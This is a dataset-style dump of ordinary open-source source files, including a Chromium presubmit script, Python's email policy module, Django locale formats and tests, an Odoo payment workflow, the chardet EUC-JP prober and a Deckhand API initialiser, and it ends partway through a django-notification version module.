repo_name (string, 5-100 chars) | ref (string, 12-67 chars) | path (string, 4-244 chars) | copies (string, 1-8 chars) | content (string, 0-1.05M chars, nullable)
|---|---|---|---|---|
kenshay/ImageScript
|
refs/heads/master
|
ProgramData/Android/ADB/platform-tools/systrace/catapult/devil/PRESUBMIT.py
|
9
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Presubmit script for devil.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts for
details on the presubmit API built into depot_tools.
"""
def _RunPylint(input_api, output_api):
return input_api.RunTests(input_api.canned_checks.RunPylint(
input_api, output_api, pylintrc='pylintrc'))
def _RunUnitTests(input_api, output_api):
def J(*dirs):
"""Returns a path relative to presubmit directory."""
return input_api.os_path.join(
input_api.PresubmitLocalPath(), 'devil', *dirs)
test_env = dict(input_api.environ)
test_env.update({
'PYTHONDONTWRITEBYTECODE': '1',
'PYTHONPATH': ':'.join([J(), J('..')]),
})
message_type = (output_api.PresubmitError if input_api.is_committing
else output_api.PresubmitPromptWarning)
return input_api.RunTests([
input_api.Command(
name='devil/bin/run_py_tests',
cmd=[
input_api.os_path.join(
input_api.PresubmitLocalPath(), 'bin', 'run_py_tests')],
kwargs={'env': test_env},
message=message_type)])
def _EnsureNoPylibUse(input_api, output_api):
def other_python_files(f):
this_presubmit_file = input_api.os_path.join(
input_api.PresubmitLocalPath(), 'PRESUBMIT.py')
return (f.LocalPath().endswith('.py')
and not f.AbsoluteLocalPath() == this_presubmit_file)
changed_files = input_api.AffectedSourceFiles(other_python_files)
import_error_re = input_api.re.compile(
r'(from pylib.* import)|(import pylib)')
errors = []
for f in changed_files:
errors.extend(
'%s:%d' % (f.LocalPath(), line_number)
for line_number, line_text in f.ChangedContents()
if import_error_re.search(line_text))
if errors:
return [output_api.PresubmitError(
'pylib modules should not be imported from devil modules.',
items=errors)]
return []
def CommonChecks(input_api, output_api):
output = []
output += _RunPylint(input_api, output_api)
output += _RunUnitTests(input_api, output_api)
output += _EnsureNoPylibUse(input_api, output_api)
return output
def CheckChangeOnUpload(input_api, output_api):
return CommonChecks(input_api, output_api)
def CheckChangeOnCommit(input_api, output_api):
return CommonChecks(input_api, output_api)
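# Clarifying note: depot_tools calls CheckChangeOnUpload during `git cl upload`
# and CheckChangeOnCommit when the change is landed; both defer to CommonChecks,
# so uploads and commits run the same pylint, unit-test and pylib-import checks,
# with unit-test failures downgraded to prompt warnings on upload via the
# is_committing switch in _RunUnitTests.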
|
75651/kbengine_cloud
|
refs/heads/master
|
kbe/src/lib/python/Lib/email/_policybase.py
|
94
|
"""Policy framework for the email package.
Allows fine grained feature control of how the package parses and emits data.
"""
import abc
from email import header
from email import charset as _charset
from email.utils import _has_surrogates
__all__ = [
'Policy',
'Compat32',
'compat32',
]
class _PolicyBase:
"""Policy Object basic framework.
This class is useless unless subclassed. A subclass should define
class attributes with defaults for any values that are to be
managed by the Policy object. The constructor will then allow
non-default values to be set for these attributes at instance
creation time. The instance will be callable, taking these same
attributes as keyword arguments, and returning a new instance
identical to the called instance except for those values changed
by the keyword arguments. Instances may be added, yielding new
instances with any non-default values from the right hand
operand overriding those in the left hand operand. That is,
A + B == A(<non-default values of B>)
The repr of an instance can be used to reconstruct the object
if and only if the repr of the values can be used to reconstruct
those values.
"""
def __init__(self, **kw):
"""Create new Policy, possibly overriding some defaults.
See class docstring for a list of overridable attributes.
"""
for name, value in kw.items():
if hasattr(self, name):
super(_PolicyBase,self).__setattr__(name, value)
else:
raise TypeError(
"{!r} is an invalid keyword argument for {}".format(
name, self.__class__.__name__))
def __repr__(self):
args = [ "{}={!r}".format(name, value)
for name, value in self.__dict__.items() ]
return "{}({})".format(self.__class__.__name__, ', '.join(args))
def clone(self, **kw):
"""Return a new instance with specified attributes changed.
The new instance has the same attribute values as the current object,
except for the changes passed in as keyword arguments.
"""
newpolicy = self.__class__.__new__(self.__class__)
for attr, value in self.__dict__.items():
object.__setattr__(newpolicy, attr, value)
for attr, value in kw.items():
if not hasattr(self, attr):
raise TypeError(
"{!r} is an invalid keyword argument for {}".format(
attr, self.__class__.__name__))
object.__setattr__(newpolicy, attr, value)
return newpolicy
def __setattr__(self, name, value):
if hasattr(self, name):
msg = "{!r} object attribute {!r} is read-only"
else:
msg = "{!r} object has no attribute {!r}"
raise AttributeError(msg.format(self.__class__.__name__, name))
def __add__(self, other):
"""Non-default values from right operand override those from left.
The object returned is a new instance of the subclass.
"""
return self.clone(**other.__dict__)
def _append_doc(doc, added_doc):
doc = doc.rsplit('\n', 1)[0]
added_doc = added_doc.split('\n', 1)[1]
return doc + '\n' + added_doc
def _extend_docstrings(cls):
if cls.__doc__ and cls.__doc__.startswith('+'):
cls.__doc__ = _append_doc(cls.__bases__[0].__doc__, cls.__doc__)
for name, attr in cls.__dict__.items():
if attr.__doc__ and attr.__doc__.startswith('+'):
for c in (c for base in cls.__bases__ for c in base.mro()):
doc = getattr(getattr(c, name), '__doc__')
if doc:
attr.__doc__ = _append_doc(doc, attr.__doc__)
break
return cls
class Policy(_PolicyBase, metaclass=abc.ABCMeta):
r"""Controls for how messages are interpreted and formatted.
Most of the classes and many of the methods in the email package accept
Policy objects as parameters. A Policy object contains a set of values and
functions that control how input is interpreted and how output is rendered.
For example, the parameter 'raise_on_defect' controls whether an RFC
violation results in an error being raised, while 'max_line_length'
controls the maximum length of output lines when a Message is serialized.
Any valid attribute may be overridden when a Policy is created by passing
it as a keyword argument to the constructor. Policy objects are immutable,
but a new Policy object can be created with only certain values changed by
calling the Policy instance with keyword arguments. Policy objects can
also be added, producing a new Policy object in which the non-default
attributes set in the right hand operand overwrite those specified in the
left operand.
Settable attributes:
raise_on_defect -- If true, then defects should be raised as errors.
Default: False.
linesep -- string containing the value to use as separation
between output lines. Default '\n'.
cte_type -- Type of allowed content transfer encodings
7bit -- ASCII only
8bit -- Content-Transfer-Encoding: 8bit is allowed
Default: 8bit. Also controls the disposition of
(RFC invalid) binary data in headers; see the
documentation of the fold_binary method.
max_line_length -- maximum length of lines, excluding 'linesep',
during serialization. None or 0 means no line
wrapping is done. Default is 78.
"""
raise_on_defect = False
linesep = '\n'
cte_type = '8bit'
max_line_length = 78
def handle_defect(self, obj, defect):
"""Based on policy, either raise defect or call register_defect.
handle_defect(obj, defect)
defect should be a Defect subclass, but in any case must be an
Exception subclass. obj is the object on which the defect should be
registered if it is not raised. If the raise_on_defect is True, the
defect is raised as an error, otherwise the object and the defect are
passed to register_defect.
This method is intended to be called by parsers that discover defects.
The email package parsers always call it with Defect instances.
"""
if self.raise_on_defect:
raise defect
self.register_defect(obj, defect)
def register_defect(self, obj, defect):
"""Record 'defect' on 'obj'.
Called by handle_defect if raise_on_defect is False. This method is
part of the Policy API so that Policy subclasses can implement custom
defect handling. The default implementation calls the append method of
the defects attribute of obj. The objects used by the email package by
default that get passed to this method will always have a defects
attribute with an append method.
"""
obj.defects.append(defect)
def header_max_count(self, name):
"""Return the maximum allowed number of headers named 'name'.
Called when a header is added to a Message object. If the returned
value is not 0 or None, and there are already a number of headers with
the name 'name' equal to the value returned, a ValueError is raised.
Because the default behavior of Message's __setitem__ is to append the
value to the list of headers, it is easy to create duplicate headers
without realizing it. This method allows certain headers to be limited
in the number of instances of that header that may be added to a
Message programmatically. (The limit is not observed by the parser,
which will faithfully produce as many headers as exist in the message
being parsed.)
The default implementation returns None for all header names.
"""
return None
@abc.abstractmethod
def header_source_parse(self, sourcelines):
"""Given a list of linesep terminated strings constituting the lines of
a single header, return the (name, value) tuple that should be stored
in the model. The input lines should retain their terminating linesep
characters. The lines passed in by the email package may contain
surrogateescaped binary data.
"""
raise NotImplementedError
@abc.abstractmethod
def header_store_parse(self, name, value):
"""Given the header name and the value provided by the application
program, return the (name, value) that should be stored in the model.
"""
raise NotImplementedError
@abc.abstractmethod
def header_fetch_parse(self, name, value):
"""Given the header name and the value from the model, return the value
to be returned to the application program that is requesting that
header. The value passed in by the email package may contain
surrogateescaped binary data if the lines were parsed by a BytesParser.
The returned value should not contain any surrogateescaped data.
"""
raise NotImplementedError
@abc.abstractmethod
def fold(self, name, value):
"""Given the header name and the value from the model, return a string
containing linesep characters that implement the folding of the header
according to the policy controls. The value passed in by the email
package may contain surrogateescaped binary data if the lines were
parsed by a BytesParser. The returned value should not contain any
surrogateescaped data.
"""
raise NotImplementedError
@abc.abstractmethod
def fold_binary(self, name, value):
"""Given the header name and the value from the model, return binary
data containing linesep characters that implement the folding of the
header according to the policy controls. The value passed in by the
email package may contain surrogateescaped binary data.
"""
raise NotImplementedError
@_extend_docstrings
class Compat32(Policy):
"""+
This particular policy is the backward compatibility Policy. It
replicates the behavior of the email package version 5.1.
"""
def _sanitize_header(self, name, value):
# If the header value contains surrogates, return a Header using
# the unknown-8bit charset to encode the bytes as encoded words.
if not isinstance(value, str):
# Assume it is already a header object
return value
if _has_surrogates(value):
return header.Header(value, charset=_charset.UNKNOWN8BIT,
header_name=name)
else:
return value
def header_source_parse(self, sourcelines):
"""+
The name is parsed as everything up to the ':' and returned unmodified.
The value is determined by stripping leading whitespace off the
remainder of the first line, joining all subsequent lines together, and
stripping any trailing carriage return or linefeed characters.
"""
name, value = sourcelines[0].split(':', 1)
value = value.lstrip(' \t') + ''.join(sourcelines[1:])
return (name, value.rstrip('\r\n'))
def header_store_parse(self, name, value):
"""+
The name and value are returned unmodified.
"""
return (name, value)
def header_fetch_parse(self, name, value):
"""+
If the value contains binary data, it is converted into a Header object
using the unknown-8bit charset. Otherwise it is returned unmodified.
"""
return self._sanitize_header(name, value)
def fold(self, name, value):
"""+
Headers are folded using the Header folding algorithm, which preserves
existing line breaks in the value, and wraps each resulting line to the
max_line_length. Non-ASCII binary data are CTE encoded using the
unknown-8bit charset.
"""
return self._fold(name, value, sanitize=True)
def fold_binary(self, name, value):
"""+
Headers are folded using the Header folding algorithm, which preserves
existing line breaks in the value, and wraps each resulting line to the
max_line_length. If cte_type is 7bit, non-ascii binary data is CTE
encoded using the unknown-8bit charset. Otherwise the original source
header is used, with its existing line breaks and/or binary data.
"""
folded = self._fold(name, value, sanitize=self.cte_type=='7bit')
return folded.encode('ascii', 'surrogateescape')
def _fold(self, name, value, sanitize):
parts = []
parts.append('%s: ' % name)
if isinstance(value, str):
if _has_surrogates(value):
if sanitize:
h = header.Header(value,
charset=_charset.UNKNOWN8BIT,
header_name=name)
else:
# If we have raw 8bit data in a byte string, we have no idea
# what the encoding is. There is no safe way to split this
# string. If it's ascii-subset, then we could do a normal
# ascii split, but if it's multibyte then we could break the
# string. There's no way to know so the least harm seems to
# be to not split the string and risk it being too long.
parts.append(value)
h = None
else:
h = header.Header(value, header_name=name)
else:
# Assume it is a Header-like object.
h = value
if h is not None:
parts.append(h.encode(linesep=self.linesep,
maxlinelen=self.max_line_length))
parts.append(self.linesep)
return ''.join(parts)
compat32 = Compat32()
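# A minimal usage sketch of the clone()/addition semantics described in the
# _PolicyBase docstring; illustrative only, and guarded so importing the module
# is unaffected.
if __name__ == '__main__':
    strict = compat32.clone(raise_on_defect=True)   # one non-default override
    crlf = compat32.clone(linesep='\r\n')
    combined = strict + crlf                        # right operand's non-defaults win
    assert combined.raise_on_defect is True
    assert combined.linesep == '\r\n'
    try:
        compat32.linesep = '\r\n'                   # instances are read-only
    except AttributeError:
        pass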
|
avneesh91/django
|
refs/heads/master
|
django/conf/locale/da/formats.py
|
65
|
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'd.m.Y'
SHORT_DATETIME_FORMAT = 'd.m.Y H:i'
FIRST_DAY_OF_WEEK = 1
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d.%m.%Y', # '25.10.2006'
]
DATETIME_INPUT_FORMATS = [
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M:%S.%f', # '25.10.2006 14:30:59.000200'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
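# Worked example (assuming the Danish locale is active and localisation is
# enabled): datetime(2006, 10, 25, 14, 30) renders as "25. oktober 2006 14:30"
# with DATETIME_FORMAT and "25.10.2006 14:30" with SHORT_DATETIME_FORMAT, while
# 1234567.89 renders as "1.234.567,89" when USE_THOUSAND_SEPARATOR is on.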
|
camillemonchicourt/Geotrek
|
refs/heads/master
|
geotrek/tourism/migrations/0003_auto__change_field_datasource_targets.py
|
1
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'DataSource.targets'
db.alter_column('t_t_source_donnees', 'targets', self.gf('multiselectfield.db.fields.MultiSelectField')(max_length=512, null=True))
def backwards(self, orm):
# Changing field 'DataSource.targets'
db.alter_column('t_t_source_donnees', 'targets', self.gf('multiselectfield.db.fields.MultiSelectField')(max_length=200, null=True))
models = {
u'tourism.datasource': {
'Meta': {'ordering': "['title', 'url']", 'object_name': 'DataSource', 'db_table': "'t_t_source_donnees'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pictogram': ('django.db.models.fields.files.FileField', [], {'max_length': '512', 'db_column': "'picto'"}),
'targets': ('multiselectfield.db.fields.MultiSelectField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_column': "'titre'"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_column': "'type'"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'db_column': "'url'"})
}
}
complete_apps = ['tourism']
|
OCA/sale-workflow
|
refs/heads/12.0
|
sale_automatic_workflow_payment_mode/models/automatic_workflow_job.py
|
1
|
# © 2016 Camptocamp SA, Sodexis
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html)
import logging
from odoo import models, api, fields
from odoo.tools.safe_eval import safe_eval
from odoo.addons.sale_automatic_workflow.models.automatic_workflow_job \
import savepoint
_logger = logging.getLogger(__name__)
class AutomaticWorkflowJob(models.Model):
_inherit = 'automatic.workflow.job'
@api.model
def run_with_workflow(self, sale_wkf):
workflow_domain = [('workflow_process_id', '=', sale_wkf.id)]
res = super(AutomaticWorkflowJob, self).run_with_workflow(sale_wkf)
if sale_wkf.register_payment:
self._register_payments(
safe_eval(sale_wkf.payment_filter_id.domain) +
workflow_domain)
return res
@api.model
def _register_payments(self, payment_filter):
invoice_obj = self.env['account.invoice']
invoices = invoice_obj.search(payment_filter)
_logger.debug('Invoices to Register Payment: %s', invoices.ids)
for invoice in invoices:
partner_type = invoice.type in ('out_invoice', 'out_refund') and \
'customer' or 'supplier'
payment_mode = invoice.payment_mode_id
if not payment_mode.fixed_journal_id:
_logger.debug('Unable to Register Payment for invoice %s: '
'Payment mode %s must have fixed journal',
invoice.id, payment_mode.id)
return
with savepoint(self.env.cr):
payment = self.env['account.payment'].create({
'invoice_ids': [(6, 0, invoice.ids)],
'amount': invoice.residual,
'payment_date': fields.Date.context_today(self),
'communication': invoice.reference or invoice.number,
'partner_id': invoice.partner_id.id,
'partner_type': partner_type,
'payment_type': payment_mode.payment_type,
'payment_method_id': payment_mode.payment_method_id.id,
'journal_id': payment_mode.fixed_journal_id.id,
})
payment.post()
return
|
kemalakyol48/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/tkinter/test/runtktests.py
|
67
|
"""
Use this module to get and run all tk tests.
tkinter tests should live in a package inside the directory where this file
lives, like test_tkinter.
Extensions also should live in packages following the same rule as above.
"""
import os
import sys
import unittest
import importlib
import test.support
this_dir_path = os.path.abspath(os.path.dirname(__file__))
def is_package(path):
for name in os.listdir(path):
if name in ('__init__.py', '__init__.pyc', '__init__.pyo'):
return True
return False
def get_tests_modules(basepath=this_dir_path, gui=True, packages=None):
"""This will import and yield modules whose names start with test_
and are inside packages found in the path starting at basepath.
If packages is specified it should contain package names that
want their tests collected.
"""
py_ext = '.py'
for dirpath, dirnames, filenames in os.walk(basepath):
for dirname in list(dirnames):
if dirname[0] == '.':
dirnames.remove(dirname)
if is_package(dirpath) and filenames:
pkg_name = dirpath[len(basepath) + len(os.sep):].replace('/', '.')
if packages and pkg_name not in packages:
continue
filenames = filter(
lambda x: x.startswith('test_') and x.endswith(py_ext),
filenames)
for name in filenames:
try:
yield importlib.import_module(
".%s.%s" % (pkg_name, name[:-len(py_ext)]),
"tkinter.test")
except test.support.ResourceDenied:
if gui:
raise
def get_tests(text=True, gui=True, packages=None):
"""Yield all the tests in the modules found by get_tests_modules.
If gui is False, only tests that do not require a GUI will be
returned."""
attrs = []
if text:
attrs.append('tests_nogui')
if gui:
attrs.append('tests_gui')
for module in get_tests_modules(gui=gui, packages=packages):
for attr in attrs:
for test in getattr(module, attr, ()):
yield test
if __name__ == "__main__":
test.support.use_resources = ['gui']
test.support.run_unittest(*get_tests())
|
sachingupta006/Mezzanine
|
refs/heads/master
|
mezzanine/template/__init__.py
|
4
|
from functools import wraps
from django import template
from django.template.context import Context
from django.template.loader import get_template, select_template
from mezzanine.utils.device import templates_for_device
class Library(template.Library):
"""
Extends ``django.template.Library`` providing several shortcuts
that attempt to take the leg-work out of creating different types
of template tags.
"""
def as_tag(self, tag_func):
"""
Creates a tag expecting the format:
``{% tag_name as var_name %}``
The decorated func returns the value that is given to
``var_name`` in the template.
"""
@wraps(tag_func)
def tag_wrapper(parser, token):
class AsTagNode(template.Node):
def render(self, context):
parts = token.split_contents()
# Resolve variables if their names are given.
def resolve(arg):
try:
return template.Variable(arg).resolve(context)
except template.VariableDoesNotExist:
return arg
args = [resolve(arg) for arg in parts[1:-2]]
context[parts[-1]] = tag_func(*args)
return ""
return AsTagNode()
return self.tag(tag_wrapper)
def render_tag(self, tag_func):
"""
Creates a tag using the decorated func as the render function
for the template tag node. The render function takes two
arguments - the template context and the tag token.
"""
@wraps(tag_func)
def tag_wrapper(parser, token):
class RenderTagNode(template.Node):
def render(self, context):
return tag_func(context, token)
return RenderTagNode()
return self.tag(tag_wrapper)
def to_end_tag(self, tag_func):
"""
Creates a tag that parses until it finds the corresponding end
tag, eg: for a tag named ``mytag`` it will parse until
``endmytag``. The decorated func's return value is used to
render the parsed content and takes three arguments - the
parsed content between the start and end tags, the template
context and the tag token.
"""
@wraps(tag_func)
def tag_wrapper(parser, token):
class ToEndTagNode(template.Node):
def __init__(self):
end_name = "end%s" % tag_func.__name__
self.nodelist = parser.parse((end_name,))
parser.delete_first_token()
def render(self, context):
args = (self.nodelist.render(context), context, token)
return tag_func(*args[:tag_func.func_code.co_argcount])
return ToEndTagNode()
return self.tag(tag_wrapper)
def inclusion_tag(self, name, context_class=Context, takes_context=False):
"""
Replacement for Django's ``inclusion_tag`` which looks up device
specific templates at render time.
"""
def tag_decorator(tag_func):
@wraps(tag_func)
def tag_wrapper(parser, token):
class InclusionTagNode(template.Node):
def render(self, context):
if not getattr(self, "nodelist", False):
try:
request = context["request"]
except KeyError:
t = get_template(name)
else:
ts = templates_for_device(request, name)
t = select_template(ts)
self.nodelist = t.nodelist
parts = [template.Variable(part).resolve(context)
for part in token.split_contents()[1:]]
if takes_context:
parts.insert(0, context)
result = tag_func(*parts)
autoescape = context.autoescape
context = context_class(result, autoescape=autoescape)
return self.nodelist.render(context)
return InclusionTagNode()
return self.tag(tag_wrapper)
return tag_decorator
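# An illustrative sketch of how a project might use the ``as_tag`` shortcut
# defined above; ``register``, ``latest_entries`` and ``Entry`` are hypothetical
# names in a templatetags module, not part of Mezzanine itself.
#
#   register = Library()
#
#   @register.as_tag
#   def latest_entries(limit=5):
#       return Entry.objects.all()[:int(limit)]
#
#   # template usage: {% latest_entries 3 as entries %}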
|
hansiu/pathways-analysis
|
refs/heads/master
|
command_line/__init__.py
|
3
|
"""This package provides Command Line Interface (CLI) implementation.
If you wish to streamline the CLI or add a new switch or argument,
please go straight to `main.py` module. Helper type definitions
are defined in `types.py`, while magic happens in `parser.py`.
"""
from .main import CLI
|
jeezybrick/django
|
refs/heads/master
|
tests/template_tests/filter_tests/test_center.py
|
345
|
from django.template.defaultfilters import center
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class CenterTests(SimpleTestCase):
@setup({'center01':
'{% autoescape off %}.{{ a|center:"5" }}. .{{ b|center:"5" }}.{% endautoescape %}'})
def test_center01(self):
output = self.engine.render_to_string('center01', {"a": "a&b", "b": mark_safe("a&b")})
self.assertEqual(output, ". a&b . . a&b .")
@setup({'center02': '.{{ a|center:"5" }}. .{{ b|center:"5" }}.'})
def test_center02(self):
output = self.engine.render_to_string('center02', {"a": "a&b", "b": mark_safe("a&b")})
self.assertEqual(output, ". a&b . . a&b .")
class FunctionTests(SimpleTestCase):
def test_center(self):
self.assertEqual(center('test', 6), ' test ')
def test_non_string_input(self):
self.assertEqual(center(123, 5), ' 123 ')
|
semonte/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyConvertToFStringIntentionTest/formatMethodByteString.py
|
31
|
b'{}'.format(42)
|
cydenix/OpenGLCffi
|
refs/heads/master
|
OpenGLCffi/GL/EXT/EXT/window_rectangles.py
|
1
|
from OpenGLCffi.GL import params
@params(api='gl', prms=['mode', 'count', 'box'])
def glWindowRectanglesEXT(mode, count, box):
pass
|
matplotlib/fcpy
|
refs/heads/master
|
examples/fc_match.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
#
# Copyright (c) 2015, Michael Droettboom
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
#
# -----------------------------------------------------------------------------
'''
Demonstrates doing font matching
'''
from __future__ import print_function, unicode_literals, absolute_import
import fcpy
config = fcpy.default_config()
config.build_fonts()
pattern = fcpy.Pattern(family="Droid Sans")
print(pattern)
config.substitute(pattern)
pattern.substitute()
print(pattern)
pattern.set('family', 'Droid Sans')
print(pattern)
match = config.match(pattern)
print(match)
print(match.get('file', 0))
|
andfoy/margffoy-tuay-server
|
refs/heads/master
|
env/lib/python2.7/site-packages/requests-2.7.0-py2.7.egg/requests/packages/chardet/eucjpprober.py
|
2918
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCJPDistributionAnalysis
from .jpcntx import EUCJPContextAnalysis
from .mbcssm import EUCJPSMModel
class EUCJPProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(EUCJPSMModel)
self._mDistributionAnalyzer = EUCJPDistributionAnalysis()
self._mContextAnalyzer = EUCJPContextAnalysis()
self.reset()
def reset(self):
MultiByteCharSetProber.reset(self)
self._mContextAnalyzer.reset()
def get_charset_name(self):
return "EUC-JP"
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
# PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar, charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i - 1:i + 1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
contxtCf = self._mContextAnalyzer.get_confidence()
distribCf = self._mDistributionAnalyzer.get_confidence()
return max(contxtCf, distribCf)
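# A minimal usage sketch (illustrative only; the sample text is arbitrary
# EUC-JP encoded Japanese) showing how a caller such as UniversalDetector
# feeds bytes to the prober and reads its verdict:
#
#   prober = EUCJPProber()
#   prober.feed(u'こんにちは'.encode('euc-jp'))
#   print(prober.get_charset_name(), prober.get_confidence(), prober.get_state())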
|
att-comdev/deckhand
|
refs/heads/master
|
deckhand/control/api.py
|
1
|
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging as py_logging
import os
from oslo_config import cfg
from oslo_log import log as logging
from oslo_policy import policy
from paste import deploy
from deckhand.db.sqlalchemy import api as db_api
CONF = cfg.CONF
logging.register_options(CONF)
LOG = logging.getLogger(__name__)
CONFIG_FILES = {
'conf': 'deckhand.conf',
'paste': 'deckhand-paste.ini'
}
_NO_AUTH_CONFIG = 'noauth-paste.ini'
def _get_config_files(env=None):
if env is None:
env = os.environ
config_files = CONFIG_FILES.copy()
dirname = env.get('DECKHAND_CONFIG_DIR', '/etc/deckhand').strip()
# Workaround the fact that this reads from a config file to determine which
# paste.ini file to use for server instantiation. This chicken and egg
# problem is solved by using ConfigParser below.
conf_path = os.path.join(dirname, config_files['conf'])
temp_conf = {}
config_parser = cfg.ConfigParser(conf_path, temp_conf)
config_parser.parse()
use_development_mode = (
temp_conf['DEFAULT'].get('development_mode') == ['true']
)
if use_development_mode:
config_files['paste'] = _NO_AUTH_CONFIG
LOG.warning('Development mode enabled - Keystone authentication '
'disabled.')
return {
key: os.path.join(dirname, file) for key, file in config_files.items()
}
def setup_logging(conf):
logging.set_defaults(default_log_levels=logging.get_default_log_levels())
logging.setup(conf, 'deckhand')
py_logging.captureWarnings(True)
def init_application():
"""Main entry point for initializing the Deckhand API service.
Create routes for the v1.0 API and sets up logging.
"""
config_files = _get_config_files()
paste_file = config_files['paste']
CONF([],
project='deckhand',
default_config_files=list(config_files.values()))
setup_logging(CONF)
policy.Enforcer(CONF)
LOG.debug('Starting WSGI application using %s configuration file.',
paste_file)
db_api.setup_db(CONF.database.connection)
app = deploy.loadapp('config:%s' % paste_file, name='deckhand_api')
return app
if __name__ == '__main__':
init_application()
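# Clarifying note: init_application() acts as a WSGI application factory. It
# resolves deckhand.conf and the paste .ini file from DECKHAND_CONFIG_DIR
# (default /etc/deckhand), switches to noauth-paste.ini when development_mode
# is true, then hands the chosen paste config to paste.deploy so a WSGI server
# can host the returned app.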
|
brosner/django-notification
|
refs/heads/master
|
notification/__init__.py
|
3
|
VERSION = (0, 2, 0, "a", 1) # following PEP 386
DEV_N = 4
def get_version():
version = "%s.%s" % (VERSION[0], VERSION[1])
if VERSION[2]:
